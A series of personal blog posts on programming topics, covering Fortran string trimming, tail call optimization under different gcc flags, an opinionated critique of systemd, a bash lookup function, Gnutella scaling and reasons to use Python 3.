It is necessary to get rid of trailing blanks (whitespace) from the last char to the end of the declared memory space, otherwise there will be huge gaps in combined strings - or you will get missing characters.

program test
  character(len=5) :: res
  write(*,*) res ! undefined. In the last run it gave me null-bytes, but
                 ! that is not guaranteed.
  res = "0"
  write(*,*) res ! 0
  res = trim(res)//"a"
  write(*,*) res ! 0a
  res = res//"a"
  write(*,*) res ! 0a: trailing characters are silently removed.
  ! who else expected to see 0aa?
  write(res, '(a, "a")') trim(res) ! without trim, this gives an error!
                                   ! *happy*
  write(*,*) res
end program test

Hint from Alexey: use trim(adjustl(…)) to get rid of whitespace on the left and the right side of the string. Trim only removes trailing blanks.

Author: Arne Babenhauserheide

Emacs 24.3.1 (Org mode 8.0.2)

AttachmentSize
surprises.org8.42 KB
accumulate.f90226 Bytes
accumulate-not.f90231 Bytes
base60-surprises.f901.6 KB
trim.f90501 Bytes
surprises.pdf206.83 KB
surprises.html22.47 KB
base60.f902.79 KB

Tail Call Optimization (TCO), dependency, broken debug builds in C and C++ — and gcc 4.8

TCO: Reducing the memory complexity of recursion from O(N) to O(1).
Debug build: Add overhead to a program to trace errors.
Debug without TCO: Obliterate any possibility of fixing recursion bugs.

“Never develop with optimizations which the debug mode of the compiler of the future maintainer of your code does not use.”°

UPDATE: GCC 4.8 gives us -Og -foptimize-sibling-calls which generates nice backtraces, and I had a few quite embarrassing errors in my C - thanks to AKF for the catch!

1 Intro

Tail Call Optimization (TCO) makes this

def foo(n):
    print(n)
    return foo(n+1)
foo(1)

behave like this

def foo(n):
    print(n)
    return n+1
n = 1
while True:
    n = foo(n)


I recently told a colleague how neat tail call optimization in scheme is (along with macros, but that is a topic for another day…).

Then I decided to actually test it (being mainly not a schemer but a pythonista - though very impressed by the possibilities of scheme).

So I implemented a very simple recursive function which I could watch to check the Tail Call behaviour. I tested scheme (via guile), python (obviously) and C++ (which proved to provide a surprise).

2 The tests

2.1 Scheme

(define (foo n)
  (display n)
  (newline)
  (foo (1+ n)))

(foo 1)

2.2 Python

def foo(n):
    print n
    return foo(n+1)

foo(1)

2.3 C++

The C++ code needed a bit more work (thanks to AKF for making it less ugly/horrible!):

#include <stdio.h>

int recurse(int n)
{
  printf("%i\n", n);
  return recurse(n+1);
}

int main()
{
  return recurse(1);
}

In addition to the code, I added 4 different ways to build it: Standard optimization (-O2), Debug (-g), Optimized Debug (-g -O2), and only slightly optimized (-O1).

all : C2 Cg Cg2 C1

# optimized
C2 : tailcallc.c
    g++ -O2 tailcallc.c -o C2

# debug build
Cg : tailcallc.c
    g++ -g tailcallc.c -o Cg

# optimized debug build
Cg2 : tailcallc.c
    g++ -g -O2 tailcallc.c -o Cg2

# only slightly optimized
C1 : tailcallc.c
    g++ -O1 tailcallc.c -o C1

3 The results

So now, let’s actually check the results. Since I’m interested in tail call optimization, I check the memory consumption of each run. If we have proper tail call optimization, the required memory will stay the same over time, if not, the function stack will get bigger and bigger till the program crashes.

3.1 Scheme

Scheme gives the obvious result. It starts counting numbers and keeps doing so. After 10 seconds it’s at 1.6 million, consuming 1.7 MiB of memory - and never changing the memory consumption.

3.2 Python

Python is no surprise either: it counts to 999 and then dies with the following traceback:

Traceback (most recent call last):
 File "tailcallpython.py", line 6, in <module>
   foo(1)
 File "tailcallpython.py", line 4, in foo
   return foo(n+1)
… repeat about 997 times …
RuntimeError: maximum recursion depth exceeded

Python has an arbitrary limit on recursion which keeps people from using tail calls in algorithms.
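For reference, that limit is an interpreter setting; raising it only postpones the crash and does not give you tail call optimization (a small aside, not from the original text):

import sys

print(sys.getrecursionlimit())  # typically 1000
sys.setrecursionlimit(10000)    # only postpones "maximum recursion depth exceeded"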

3.3 C/C++

C/C++ is a bit trickier.

First let’s see the results for the optimized run:

3.3.1 Optimized

g++ -O2 C.c -o C2
./C2

Interestingly that runs just like the scheme one: After 10s it’s at 800,000 and consumes just 144KiB of memory. And that memory consumption stays stable.

3.3.2 Debug

So, cool! C/C++ has tail call optimization. Let’s write much recursive tail call using code!

Or so I thought. Then I did the debug run.

g++ -g C.c -o Cg
./Cg 

It starts counting just like the optimized version. Then, after about 5 seconds and counting to about 260,000, it dies with a segmentation fault.

And here’s a capture of its memory consumption while it was still running (thanks to KDE’s process monitor):

Private

7228 KB   [stack]
56 KB [heap]
40 KB /usr/lib64/gcc/x86_64-pc-linux-gnu/4.7.2/libstdc++.so.6.0.17
24 KB /lib64/libc-2.15.so
12 KB /home/arne/.emacs.d/private/journal/Cg

Shared

352 KB    /usr/lib64/gcc/x86_64-pc-linux-gnu/4.7.2/libstdc++.so.6.0.17
252 KB    /lib64/libc-2.15.so
108 KB    /lib64/ld-2.15.so
60 KB /lib64/libm-2.15.so
16 KB /usr/lib64/gcc/x86_64-pc-linux-gnu/4.7.2/libgcc_s.so.1

That’s 7 MiB after less than 5 seconds runtime - all of it in the stack, since that has to remember all the recursive function calls when there is no tail call optimization.

So we now have a program which runs just fine when optimized but dies almost instantly when run in debug mode.

But at least we have nice gdb traces for the start:

recurse (n=43) at C.c:5
5         printf("%i\n", n);
43
6         return recurse(n+1);

3.4 Optimized debug build

So, is all lost? Luckily not: We can actually specify optimization with debugging information.

g++ -g -O2 C.c -o Cg2
./Cg2

When doing so, the optimized debug build chugs along just like the optimized build without debugging information. At least that’s true for GCC.

But our debug trace now looks like this:
5         printf("%i\n", n);
printf (__fmt=0x40069c "%i\n") at /usr/include/bits/stdio2.h:105
105       return __printf_chk (__USE_FORTIFY_LEVEL - 1, __fmt, __va_arg_pack ());
5
6         return recurse(n+1);

That’s not so nice, but at least we can debug with tail call optimization. We can also improve on this (thanks to AKF for that hint!): We just need to enable tail call optimization separately:

g++ -g -O1 -foptimize-sibling-calls C.c -o Cgtco
./Cgtco

But this still gives ugly backtraces (if I leave out -O1, it does not do TCO). So let’s turn to GCC 4.8 and use -Og.

g++ -g -Og -foptimize-sibling-calls C.c -o Cgtco
./Cgtco

And we have nice backtraces!

recurse (n=n@entry=1) at C.c:4
4       {
5         printf("%i\n", n);
1
6         return recurse(n+1);
5         printf("%i\n", n);
2
6         return recurse(n+1);

3.5 Only slightly optimized

Let’s invert the question: Is all well now?

Actually not…

If we activate minor optimization, we get the same unoptimized behaviour again.

g++ -O1 C.c -o C1
./C1

It counts to about 260,000 and then dies from a stack overflow. And that is pretty bad™, because it means that a programmer cannot trust his code to work when he does not know all the optimization strategies which will be used with his code.

And he has no way to declare in his code that it requires TCO to work.

4 Summary

Tail Call Optimization (TCO) turns an operation with a memory requirement of O(N)1 into one with a memory requirement of O(1).

It is a nice tool to reduce the complexity of code, but it is only safe in languages which explicitly require tail call optimization - like Scheme.

And from this we can find a conclusion for compilers:

C/C++ compilers should always use tail call optimization, including in debug builds. Otherwise C/C++ programmers should never rely on that feature, because relying on it can make certain optimization settings unusable in any code which includes their code.

And as a finishing note, I’d like to quote (very loosely) what my colleague told me from some of his real-life debugging experience:

“We run our project on an AIX ibm-supercomputer. We had spotted a problem in optimized runs, so we activated the debugger to trace the bug. But when we activated debug flags, a host of new problems appeared which were not present in optimized runs. We tried to isolate the problems, but they only appeared if we ran the full project. When we told the IBM coders about that, they asked us to provide a simple testcase… The problems likely happened due to some crazy optimizations - in our code or in the compiler.”

So the problem of undebuggable code due to a dependency of the program on optimization changes is not limited to tail call optimization. But TCO is a really nice way to show it :)

Let’s use that to make the statement above more general:

C/C++ compilers should always do those kinds of optimizations which lead to changes in the algorithmic cost of programs.

Or from a pessimistic side:

You should only rely on language features which are also available in debug mode - and you should never develop your program with optimization turned on.

And by that measure, C/C++ does not have Tail Call Optimization - at least until all mainstream compilers include TCO in their default options. Which is a pretty bleak result after the excitement I felt when I realized that optimizations can actually give C/C++ code the behavior of Tail Call Optimization.

“Never develop with optimizations which the debug mode of the compiler of the future maintainer of your code does not use.”

“Never develop with optimizations which are not required by the language standard.”

Note, though, that GCC 4.8 added the -Og option, which improves debugging a lot (Phoronix wrote about plans for that last September). It still does not include -foptimize-sibling-calls in -Og, but that might be only a matter of time… I hope it is.

Footnotes:

1 : O(1) and O(N) describe the algorithmic cost of an algorithm. If it is O(N), then the cost rises linearly with the size of the problem (N is the size, for example printing 20,000 consecutive numbers). If it is O(1), the cost is stable regardless of the size of the problem.

Top 5 systemd troubles - a strategic view for distros

systemd is a new way to start a Linux-system with the expressed goal of rethinking all of init. These are my top 5 gripes with it. (»skip the updates«)

Update (2019): I now use GNU Guix with shepherd. That’s one more better option than systemd. In that it joins OpenRC and many others.

Update (2016-09-28): Systemd is an exploit kit just waiting to be activated. And once it is active, only those who wrote it will be able to defuse it — and check whether it is defused. And it is starting: How to crash systemd in one tweet? Alternatives? Use OpenRC for system services. That’s simple and fast and full-featured with minimal fuss. Use runit for process supervision of user-services and system-services alike.

Update (2014-12-11): One more deconstruction of the strategies around systemd: systemd: Assumptions, Bullying, Consent. It shows that the attitude which forms the root of the dangers of systemd is even visible in its very source code.

Update (2014-11-19): The Debian General Resolution resulted in “We do not need a general resolution to decide systemd”. The vote page provides detailed results and statistics. Ian Jackson resigned from the Technical Committee: “And, speaking personally, I am exhausted.”

Update (2014-10-16): There is now a vote on a General Resolution in Debian for preserving the ability to switch init systems. It is linked under “Are there better solutions […]?” on the site Shall we fork Debian™? :^|.

Update (2014-10-07): Lennart hetzt (German) describes the rhetoric tricks used by Lennart Poettering to make people forget that he is a major part of the communication problems we’re facing at times - and to hide valid technical, practical, pragmatic, political and strategic criticism of Systemd.

Update (2014-09-24): boycott systemd calls for action with 12 reasons against systemd: “We do recognize the need for a new init system in the 21st century, but systemd is not it.”

Update (2014-04-03): And now we have Julian Assange warning about NSA control over Debian, Theodore Ts’o, maintainer of ext4, complaining about incomprehensible systemd, and Linus Torvalds (you know him, right?) ranting against disruptive behavior from systemd developers, going as far as refusing to merge anything from the developers in question into Linux. Should I say “I said so”? Maybe not. After all, I came pretty late. Others saw this trend 2 years before I even knew about systemd. Can we really assume that there won’t be intentional disruption? Maybe I should look for solutions. It could be a good idea to start having community-paid developers.

Update (2014-02-18): An email to the mailing list of the technical committee of debian summarized the strategic implications of systemd-adoption for Debian and RedHat. It was called conspiracy theory right away, but the gains for RedHat are obvious: RedHat would be dumb not to try this. And only a fool trusts a company. Even the best company has to put money before ethics.

Update (2013-11-20): Further reading shows that people have been giving arguments from my list since 2011, and they got answers in the range of “anything short of systemd is dumb”, “this cannot work” (while OpenRC clearly shows that it works well), requests for implementation details without justification and insults and further insults; but the arguments stayed valid for the last 2 years. That does not look like systemd has a friendly community - or is healthy for distributions adopting it. Also an OpenRC developer wrote the best rebuttal of systemd propaganda I read so far: “Alternativlos”: Systemd propaganda (note, though, that I am biased against systemd due to problems I had in the past with udev kernel-dependencies)

  • Losing Control: systemd does so many crucial things itself that the developers of distributions lose their control over the init process: If systemd developers decide to change something, the distributions might actually have to fork systemd and keep the fork up-to-date, and this requires rare skills and lots of resources (due to the pace of systemd). See the Gentoo eudev-Project for a case where this had to happen so the distribution could keep providing features its users rely on. Systemd nowadays incorporates udev. Go reason how systemd devs will act.1 Why losing control is a bad idea: Strategy Letter V: Commodities

  • No scripts (as if you can know beforehand all the things the init system will need to do in each distribution). Nowadays any system should be user-extendable to avoid bottlenecks for development. This essentially boils down to providing a scripting language. Using the language which almost every system administrator knows is a very sane choice for that - and means making it possible to use Shell-Scripts to extend the init-system. Scripts mean that the distribution will never be in a position where it is blocked because it absolutely can’t provide a given fringe feature. And as the experiment with paludis in Gentoo shows, an implementation in C isn’t magically faster than one in a scripting language and can actually be much slower (just compare paludis to pkgcore), because the execution time of the language only very rarely is the real bottleneck - and you can easily shell out that part to a faster language with negligible time loss,2 especially in shell-scripts (pun partially intended). While systemd can be told to run a shell script, this requires a mental context switch and the script cannot tie into all the machinery inside systemd. If there’s a bug in systemd, you need to fix systemd, if you need more than systemd provides out of the box, you need either a script or you have to patch systemd, and otherwise you write in a completely different language (so most people won’t have the skills to go beyond the fences of the ground defined by the systemd developers as proper for users). Why killing scripts is a bad idea: Bloatware and the 80/20 Myth

  • Linux-specific3 (are you serious??). This makes the distribution an add-on to the kernel instead of the distribution being a focus point of many different development efforts. This is a second point where distributions become commodities, and as for systemd itself, this is against the interest of the distributions. On the other hand, enabling the use of many different kernels strengthens the Distribution - even if currently only few people are using them. Why being Linux-only is a bad idea for distributions: Strategy Letter V: Commodities

  • Requiring an up-to-date kernel. This problem already gives me lots of headaches for my OLPC due to udev (from the same people as systemd… which is one of the reasons why I hope that Gentoo-devs will succeed with eudev), since it is not always easy to go to a newer kernel when you’re on a fringe platform (I’m currently fighting with that). An init system should not require some special kernel version just to boot… Why those hard dependencies are a bad idea: Bloatware and the 80/20 Myth AND Strategy Letter V: Commodities

  • Requiring D-Bus. D-Bus was already broken a few times for me, and losing not just some KDE functionality but instead making my system unbootable is unacceptable. It’s bad enough that so much stuff relies on udev.4

In my understanding, we need more services which can survive without the others, so the system gets resilient against failures in a given part. As the system gets more and more complex, this constantly gets more important: Less interdependencies, and the services which are crucial to get my system in a debuggable state should be small and simple - and should not require many changes to implement new features.

Having multiple tools to solve the same problem looks like wasted resources, but actually this extends the range of problems which can be solved with our systems and avoids bottlenecks and single points of failure (either tools or communities), so it makes us resilient. Also it encourages standard-formats to minimize the cost of maintaining several systems side-by-side.

You can see how systemd manages to violate all these principles…

This does not mean, that the features provided by systemd are useless. It says that the way they are embedded in systemd with its heavy dependencies is detrimental to a healthy distribution.

Note: I am neither a developer of systemd, nor of upstart, sysvinit or OpenRC. I am just a humble user of distributions, but I can recognize impending horrible fallout when I see it.

References:

I’ll finish this with a quote from 30 myths about systemd, written by the systemd developers themselves:

We try to get rid of many of the more pointless differences of the various distributions in various areas of the core OS. As part of that we sometimes adopt schemes that were previously used by only one of the distributions and push it to a level where it's the default of systemd, trying to gently push everybody towards the same set of basic configuration.
— Lennart Poettering, main developer of systemd

I could not show much clearer why distributions should be very wary about systemd than Lennart Poettering does here in the post where he tries to refute myths about systemd.

PS: I’m definitely biased against systemd, after having some horrifying experiences with kernel-dependencies in udev. Resilience looks different. And I already modified some init scripts to adjust my systems behavior so it better fits my usecase. Now go and call me part of a fringe group which wants to add “pointless differences” to the system. If you force Gentoo devs to issue a warning in the style of “you MUST activate feature X in your kernel, else your system will become unbootable”, this should be a big red flag to you that you’re doing something wrong. If you do that twice, this is a big red flag to users not to trust your software. And regaining that trust requires reestablishing a long record of solid work. Which I do not see at the moment. Also do read Bloatware and the 80/20 Myth (if you didn’t do that by now): It might be true that 80% of the users only use 20% of the features, but they do not use the same 20%.


  1. Update 2014: Actually there is no need to guess how the systemd developers will act: They showed (again) that they will keep breaking systems of their users: “udev now silently fails to do anything useful if devtmpfs is missing, almost as if resilience was a disease” — bonsaikitten, Gentoo developer, 2014-01, long after udev was subsumed into systemd. 

  2. Running a program in a subshell increases the runtime by just six milliseconds. I measured that when testing ways to run GNU Guile modules as scripts. So you have to start almost 100 subshells during bootup to lose half a second of runtime. Note that OpenRC can boot a system and power down again in under 0.7 seconds and the minimal boot-to-login just takes 250 ms. There is no need for systemd to get a faster boot. 

  3. The systemd proponents in the debian initsystem discussion explicitly stated that they don’t want to port systemd to other kernels. 

  4. And D-Bus is slow, slow, slow when your system is under heavy memory and IO-pressure, as my systems tend to be (I’m a Gentoo user. I often compile a new version of all KDE-components or of Firefox while I do regular work on the computer). From dbus I’m used to reaction times up to several seconds… 

Translating a lookup-dictionary to bash: Much simpler than I thought

I wanted to name Transcom Regions in my plots by passing their names to the command-line tool, but I only had their region-number and a lookup dictionary in Python. To avoid tampering with the tool, I needed to translate the dictionary to a bash function, and thanks to the case statement it was much simpler than I had expected.

This is the original dictionary:

#: Names of transcom regions
transcomregionnames = {
    1: "NAM Boreal",
    2: "NAM Temperate",
    3: "South American tropical",
    # and so forth
}

This is how lookup works in Python:

region = 2
name = transcomregionnames[region]

The solution in bash is a simple mechanic translation:

function regionname () {
    number="$1"
    case $number in
        1) echo "NAM Boreal";;
        2) echo "NAM Temperate";;
        3) echo "South American tropical";;
        # and so forth
    esac
}

And the lookup is easier than anything I hoped for:

region=2
name=$(regionname $region)

This is how it looks in my actual code:

for region in {1..22} ; do ./plotstation.py -c /home/arne/sun-work/ct-tccon/ct-tccon-2015-5x7-use-obspack-no-tccon-nc/ -C "GA: in-situ ground and aircraft"  -c /home/arne/sun-work/ct-tccon/ct-tccon-2015-5x7-use-obspack-use-tccon-noassimeu/ -C "TneGA: non-European TCCON and GA" -c /home/arne/sun-work/ct-tccon/ct-tccon-2015-5x7-use-obspack-no-tccon-no-aircraft-doesitbreaktoo/ -C "G: in-situ ground"  --regionfluxtimeseries $region --toaverage 5 --exclude-validation  --colorscheme paulforabp --linewidth 4 --font-size 36 --start 2009-12-03 --stop 2012-12-02  --title "Effect of assimilating non-EU TCCON, $(regionname ${region})"  -o ~/flux-GA-vs-TneGA-vs-G-region-${region}.pdf; done

For your convenience, here’s my entire transcom naming function:

function regionname () {
    number="$1"
    case $number in
        1) echo "NAM Boreal" ;;
        2) echo "NAM Temperate";;
        3) echo "South American tropical";;
        4) echo "South American temperate";;
        5) echo "Northern Africa";;
        6) echo "Southern Africa";;
        7) echo "Eurasian Boreal";;
        8) echo "Eurasian Temperate";;
        9) echo "Tropical Asia";;
        10) echo "Australia";;
        11) echo "Europe";;
        12) echo "North Pacific Temperate";;
        13) echo "West Pacific Tropics";;
        14) echo "East Pacific Tropics";;
        15) echo "South Pacific Temperate";;
        16) echo "Northern Ocean";;
        17) echo "North Atlantic Temperate";;
        18) echo "Atlantic Tropics";;
        19) echo "South Atlantic Temperate";;
        20) echo "Southern Ocean";;
        21) echo "Indian Tropical";;
        22) echo "South Indian Temperate";;
    esac
}

Happy Hacking!

Weltenwald-theme under AGPL (Drupal)

After the last round of polishing, I decided to publish my theme under AGPLv3. Reason: If you use AGPL code and people access it over a network, you have to offer them the code. Which I hereby do ;)
That’s the only way to make sure that website code stays free.

It’s still for Drupal 5, because I didn’t get around to port it, and it has some ugly hacks, but it should be fully functional.

Just untar it in any Drupal 5 install.

tar xjf weltenwald-theme-2010-08-05_r1.tar.bz2

Maybe I’ll get around to properly package it in the future…

Until then, feel free to do so yourself :)

And should I change the theme without posting a new layout here, just drop me a line and I’ll upload a new version — as required by AGPL. And should you have some problem, or if something should be missing, please drop me a line, too.

No screenshot, because a live version kicks a screenshot any day ;)
(in case it isn’t clear: Weltenwald is the theme I use on this site)

Attachment  Size
weltenwald-theme-2010-08-05_r1.tar.bz2  877.74 KB

Which language is best, C, C++, Python or Java?

My answer to the question about the best language on Quora. If you continue reading from here, please stick with me to the end. Ready to read to the end? Enjoy the ride!

My current answer is: Scheme ☺ It gives me a large degree of freedom to explore ways to program which were much harder to explore in Python, C++ and Java. That’s why I’m currently switching from Python to Scheme.1

But depending on my current step on the road to improve my skills2 and the development group and project, that answer might have been any other language — C, C++, Java, Python, Fortran, R, Ruby, Haskell, Go, Rust, Clojure, ….

Therefore this answer is as subjective as most other answers, because we have no context on your personal situation nor on the people with whom you’ll work and from whom you can learn or the requirements of the next project you want to tackle.

Put another way:

The only correct answer is “it depends”.

The other answers in this thread should help you find the right answer for you.

Why Gnutella scales quite well

You might have read in some (almost ancient) papers that a network like Gnutella can't scale. So I want to show you why the current version of Gnutella does scale, and scales well.

In earlier versions, up to v0.4, Gnutella was a pure broadcast network. That means that every search request reached every participant, so in an optimal network the number of search requests hitting each node was exactly equal to the number of requests made by all nodes in the network. You can easily see why that can't scale.
But that was only true for Gnutella 0.4.

In the current incarnation of Gnutella (Gnutella 0.6), Gnutella is no longer a pure Broadcast network. Instead, only the smallest percentage of the traffic is done via broadcast.

If you want to read about the methods used to realize this, please have a look at the GnuFU guide (english, german).

Here I want to limit it to the statement that the first two hops of a search request are governed via Dynamic Querying, which stops the request as soon as it has enough sources (a search is stopped as soon as it gets about 250 results), and that the last two hops are governed via the Query Routing Protocol, which ensures that a search request reaches only those hosts which can actually have the file (only about 5% of the nodes).
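
To make the Query Routing Protocol part easier to picture, here is a strongly simplified sketch in Python (the real protocol exchanges fixed-size hash tables between leaves and Ultrapeers and only applies on the last hops; the function names and table size here are just illustrative):

def keyword_table(filenames, table_size=2**16):
    # each leaf announces a table of keyword hashes for its shared files
    table = set()
    for name in filenames:
        for word in name.lower().split():
            table.add(hash(word) % table_size)
    return table

def route_query(query, leaves, table_size=2**16):
    # an Ultrapeer forwards the query only to leaves whose table claims all keywords
    wanted = {hash(word) % table_size for word in query.lower().split()}
    return [leaf for leaf, table in leaves.items() if wanted <= table]

leaves = {
    "leaf-a": keyword_table(["free culture essay", "gnutella guide"]),
    "leaf-b": keyword_table(["holiday photos 2006"]),
}
print(route_query("gnutella guide", leaves))  # ['leaf-a']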

So in todays reality, Gnutella is a quite structured and very flexible network.

To scale it, Ultrapeers can increase their number of connections from their current 32 upwards, which makes Dynamic Querying (DQ) and the Query Routing Protocol (QRP) even more effective.

In the case of DQ most queries for popular files will still provide enough results after the same number of clients have been contacted, so increasing the number of connections won't change the network traffic caused by the first two steps at all.

In the case of QRP, queries will still only reach the hosts which can have the file, and if Ultrapeers are connected to more nodes at the same time (by increasing the number of connections), each connection will provide more results, so DQ will stop even earlier than with fewer connections per Ultrapeer.

So Gnutella is now far from a broadcast model, and the act of increasing the size of the Gnutella Network can even increase its efficiency for popular files.

For rare files, QRP kicks in with full force, and even though DQ will likely check all other nodes for content, QRP will make sure that only those nodes are reached which can have the content, which might be only 0.1% of the net or even far less.

Here, increasing the number of nodes per Ultrapeer means that nodes with rare files are in effect closer to you than before, so Gnutella also gets more efficient when you increase the network size, when rare file searches are your major concern.

So you can see that Gnutella has become a network which scales extremely well for keyword searches, and due to that it can also be used very efficiently to search for metadata and similar concepts.

The only thing which Gnutella can't do well are searches for strings which aren't separate words (for example file-hashes), because that kills QRP, so they will likely not reach (m)any hosts. For these types of searches, the Gnutella developers work on a DHT (Distributed Hash Table), which will only be used if the string can't be split into separate words, and that DHT will most likely be Kademlia, which is also proven to work quite well.

And with that, the only problem which remains in need of fixing is spam, because that inhibits DQ when you do a rare search, but I am sure that the devs will also find a way to stop spamming, and even with spam, Gnutella is quite effective and consumes very little bandwidth, when you are acting as a leaf, and only moderate bandwidth when you are acting as ultrapeer.

Some figures as finishing touch:

  • Leaf network traffic: About 1kB/s if you add outgoing and incoming traffic, which is about a seventh of the speed of a 56k modem.
  • Ultrapeer traffic: About 7kB/s, outgoing and incoming added together, which is about one full ISDN line or less than 1/8th of a DSL's outgoing speed.

Have fun with Gnutella!
- ArneBab 08:14, 15. Nov 2006 (CET)

PS: This guide ignores that requests must travel through intermediate nodes. But since those nodes make up only about 3% of the network and only 3% of those nodes will be reached by a (QRP-routed) rare file request, it seems safe to ignore these 0.1% of the network in the calculations for the sake of making them easier to follow mentally (QRP takes care of that).

Why Python 3?

At the Institute we use both Python 2 and Python 3. While researching the current differences (Python 3.5, compared to Python 2.7), I found two beautiful articles by Python core developer Brett Cannon and summarized them for my work group.

The articles:

  1. Why Python 3: Why Python3 exists
  2. Why use 3: How to pitch Python 3 to Management

The relevant points for us1 are the following:

  1. Why Python 3 was necessary:

    • Python2: string = byte-array.
      • Py3 avoids Encoding-Bugs in Unicode: all Strings are Unicode.
    • Python2: sources in ASCII. β in a comment needed # encoding: utf-8
      • Py3 uses utf-8 in source files by default.
    • Last chance to fix these: the cost of the change increased every year.
  2. Why use 3 (relevant for us, e.g. for new projects):

    • int/long -> int
    • Unicode in code: σ = sqrt(var) # only letters, so e.g. not the ∑ sign
    • H.dot(β) -> H @ β
    • chained exceptions: Traceback ... during handling ... Traceback — simplifies debugging
    • print() facilitates structured output2

The effect of these points is much larger than this short text suggests: fewer surprises, fewer awkward workarounds, and easier debugging.
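
To make two of the points above more concrete, here is a tiny sketch (read_config and the commented β/σ lines are just made-up illustrations, not code from the articles):

def read_config(path):
    try:
        with open(path) as f:
            return f.read()
    except OSError as error:
        # chained exception: the original OSError stays visible in the traceback
        raise RuntimeError("could not load configuration") from error

# Unicode identifiers and the @ matrix operator (the latter needs numpy):
# import numpy as np
# β = np.linalg.solve(H.T @ H, H.T @ y)
# σ = (H @ β).std()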


  1. I have summarized them because I can not expect scientists (or other people who only use Python) to read the full articles, just to decide what they do when they get the chance to tackle a new project. 

  2. Example for print():
    nums = [1, 2, 3]
    with open("data.csv", "a") as f:
        print(*nums, sep=";", file=f) 

Write programs you can still hack when you feel dumb

Debugging is twice as hard as writing the code in the first place. Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it. — Brian Kernighan

In the article Hyperfocus and balance, Arc Riley from PySoy talks about trying to get to the Hyperfocus state without endangering his health. Since I have similar needs, I am developing some strategies for that myself (though not for my health, but because my wife and children can’t be expected to let me work 8h without any interruptions in my free time).

Different from Arc, I try to change my programming habits instead of changing myself to fit to the requirements of my habits.1

Easy times

Let’s begin with Programming while you feel great.

The guideline I learned from writing PnP roleplaying games is to keep the number of things to know at 7 or less at each point (according to Miller, 1956; though the current best guess of the limitation for average humans is only 4 objects!). For a function of code I would convert that as follows:

  1. You need to keep in mind the function you work in (location), and
  2. the task it should perform (purpose and effect), and
  3. the resources it uses (arguments or global values/class attributes).

Only 4 things left for the code of your function. (three if you use both class attributes/global values and function arguments. Two, if you have complex custom data-structures with peculiar names or access-methods which you have to understand for doing anything. One if you also have to remember the commands of an unfamiliar2 editor or VCS tool. See how fast this approaches zero even when starting with 7 things?)

Add an if-switch, for-loop or similar and you have only 3 things left.

You need those for what the function should actually do, so better put further complexities into subfunctions.

Also ensure that each of the things you work with is easy enough. If you get the things you use down to 7 by writing functions with 20 arguments, you don’t win anything. Just the resources you could use in the function will blow your mind when you try to change the function a few months later. This goes for every part of your program: The number of functions, the number of function arguments, the number of variables, the lines of code per function and even the number of hierarchy levels you use to reduce the other things you need to keep in mind at any given time.

Hard times

But if you want to be able to hack that code while you feel dumb (compared to those streaks of genius when you can actually hold the whole structure of your program in your head and foresee every effect of a given change before actually doing it), you need to make sure that you don’t have to take all 7 things into account.

Tune it down for the times when you feel dumb by starting with 5 things.3 After subtracting one for the location, one for the task and one for the resources, you are left with only two things:

Two things for your function. Some logic and calling other functions are already those 2 things.

If it is an if-switch, let it be just an if-switch calling other functions.4 Yes, it may feel much easier to do it directly here, when you are fully embedded in your code and feel great, but it will bite you when you are down. Which is exactly when you won’t want to be bitten by your own code.

Loose coupling and tight cohesion

Programming is a constant battle against complexity. Stumble from the sweet spot of your program into any direction, and complexity raises its ugly head. But finding the sweet spot requires constant vigilance, as it shifts with the size and structure of your program and your development group.

To find a practical way of achieving this, Django’s concept of loose coupling and tight cohesion (more detailed) helped me most, because it reduces the interdependencies.

The effects of any given change should be contained in the part of the code you work in - and in one type of code.

As a web framework, Django separates the templates, the URI definitions, the program code and the database access from each other. (see how these are already 4 categories, hitting the limit of our mind again?)

For a game on the other hand, you might want to separate story, game logic, presentation (what you see on the screen) and input/user actions. Also people who write a scenario or level should only have to work in one type of code, neatly confined in one file or a small set of files which reside in the same place.

And for a scientific program, data input, task definition, processing and data output might be separated.

Remember that this separation does not only mean that you put those parts of the code into different files, but that they are loosely coupled:5

They only use lean and clearly defined interfaces and don’t need to know much about each other.

Conclusions

This strategy does not only make your program easier to adapt (because the parts you need to change for implementing a given feature are smaller). If you apply it not only to the bigger structure, but to every part of the program, its main advantage is that any part of the code can be understood without having to understand other parts.

And you can still understand and hack your code when your child is sick, your wife is overworked, you slept 3 hours the night before - and can only work for half an hour straight, because it’s evening and you don’t want to be a creep (but this change has to be finished nonetheless).

Note that finding a design which accomplishes this is far more complex than it sounds. If people can read your code and say “oh, that’s easy. I can hack that” (and manage to do so), then you did it right.

Designing a simple structure to solve a complex task is far harder than designing a complex structure to solve that task.

And being able to hack your program while you feel dumb (and maybe even hold it in your head) is worth investing some of your genius-time6 into your design (and repeating that whenever your code grows too hairy).

PS (7 years later): This only applies to the version of your code that stays in your codebase. During short-term experiments these rules do not apply, because there you still have the newly written code in your head. But take pains to clean it up before it takes on a life of its own. The last point for that is when you realize that you’re no longer sure how it works (then you know that you already missed the point of refactoring, but you can at least save your colleagues and your future self from stumbling even worse than you do at that moment). That way you also always have some leeway in short-term complexity that you can use during future experimentation. Also don’t make your code too simple: If you find that you’re bored while coding or that you spend more time fighting the structures you built than solving the actual problems, you took these principles too far, because you’re no longer getting full benefits from your brain. Well chosen local complexity reduces global complexity and the required work per change.


  1. Where I got bitten badly by my high-performance coding habits is the keyboard layout evolution program. I did not catch my error when the structure grew too complex (while adding stuff), and now that I do not have as much uninterrupted time as before, I cannot work on it efficiently anymore. I’m glad that this happened with a mostly finished project on whose evolution no one’s future depended. Still it is sad that this will keep me from turning it into a realtime visual layout optimizer. I can still work on its existing functionality (I kept improving it for the most important task: the cost calculation), but adding new functionality is a huge pain. 

  2. This limit only applies to unfamiliar things: things you did not yet learn well enough that they work automatically. Once you know a tool well enough that you don’t have to think about it anymore, it no longer counts against the 7 thing limit, since you don’t need to remember it.7 That’s strong support for writing conventional code — or at least code you’ll still write similarly a decade later — and using tools which can accompany you for a long time. 

  3. See how I actually don’t get below 5 here? A good TODO list which shows you the task so you can forget it while coding might get you down to 4. But don’t bet on it. Not knowing where you are or where you want to go are recipes for disaster… And if you make your functions too small, the collection of functions gets more complex, or the object hierarchy too deep, adding complexity at other places and making it harder to change the structure (refactor) when requirements change. Well, no one said creating well-structured programs would be easy. You need to find the right compromise for you. 

